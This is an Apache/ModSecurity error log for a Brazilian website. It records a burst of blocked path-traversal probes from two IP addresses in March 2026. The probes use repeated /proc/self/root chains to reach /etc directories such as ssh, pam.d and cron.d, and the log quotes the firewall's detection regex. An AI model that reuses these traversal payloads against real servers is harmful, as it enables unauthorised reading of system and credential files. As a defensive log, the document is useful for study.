[Fri Mar 20 03:49:19.368367 2026] [:error] [pid 15826:tid 140411590858496] [client 74.7.241.31:47742] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzt7-oXxyEfFpUF8f9UMQAAAVI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:49:21.422933 2026] [:error] [pid 11167:tid 140411632822016] [client 74.7.243.128:52066] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzt8fHIg5MgXLBnicPMFQAAAc0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:49:21.824161 2026] [:error] [pid 31215:tid 140411658000128] [client 74.7.241.31:58900] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzt8QF0L0L-SsrnPo441wAAAso"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:49:22.864094 2026] [:error] [pid 21219:tid 140411674785536] [client 74.7.243.128:51360] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzt8vXLqtnMIWvjpaJpfAAAAog"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:49:23.439072 2026] [:error] [pid 7235:tid 140411607643904] [client 74.7.241.31:58904] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzt8_qxLDW4GITHUkSyfwAAARA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:49:24.194170 2026] [:error] [pid 9818:tid 140411658000128] [client 74.7.243.128:51366] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzt9F1pVZ5mVmJwsFMCIQAAAEo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:49:24.798592 2026] [:error] [pid 7235:tid 140411733534464] [client 74.7.241.31:58912] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzt9PqxLDW4GITHUkSygQAAAQE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:49:25.482924 2026] [:error] [pid 21219:tid 140411540502272] [client 74.7.243.128:51376] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzt9fXLqtnMIWvjpaJpfQAAApg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:49:26.188599 2026] [:error] [pid 15826:tid 140411616036608] [client 74.7.241.31:58926] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzt9uoXxyEfFpUF8f9UNQAAAU8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:49:26.792038 2026] [:error] [pid 21219:tid 140411582465792] [client 74.7.243.128:51382] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzt9vXLqtnMIWvjpaJpgQAAApM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:49:28.127310 2026] [:error] [pid 10189:tid 140411582465792] [client 74.7.243.128:51392] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzt-DJ3M9BSuKP7CAbgsgAAAJM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:49:30.838246 2026] [:error] [pid 21219:tid 140411616036608] [client 74.7.243.128:60650] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzt-fXLqtnMIWvjpaJphwAAAo8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:49:32.400439 2026] [:error] [pid 26799:tid 140411725141760] [client 74.7.243.128:60664] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzt_Na6ubjKNq_cu4afFQAAA0I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:49:33.706717 2026] [:error] [pid 11642:tid 140411708356352] [client 74.7.243.128:60668] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzt_bninkcc-iUj5AouQwAAA4Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:49:34.453429 2026] [:error] [pid 10189:tid 140411548894976] [client 74.7.241.31:56390] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzt_jJ3M9BSuKP7CAbgxAAAAJc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:49:35.039077 2026] [:error] [pid 7893:tid 140411691570944] [client 74.7.243.128:60676] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzt_xCii7xarUs8iHY0mwAAAgY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:49:35.826756 2026] [:error] [pid 11642:tid 140411674785536] [client 74.7.241.31:56398] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzt_7ninkcc-iUj5AouRgAAA4g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:49:36.367114 2026] [:error] [pid 7235:tid 140411666392832] [client 74.7.243.128:60686] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzuAPqxLDW4GITHUkSyhgAAAQk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:49:37.679600 2026] [:error] [pid 31215:tid 140411683178240] [client 74.7.243.128:60692] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzuAQF0L0L-SsrnPo443QAAAsc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:49:38.975536 2026] [:error] [pid 31215:tid 140411691570944] [client 74.7.243.128:60696] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzuAgF0L0L-SsrnPo443wAAAsY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:49:40.666692 2026] [:error] [pid 7893:tid 140411599251200] [client 74.7.243.128:39708] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzuBBCii7xarUs8iHY0nwAAAhE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
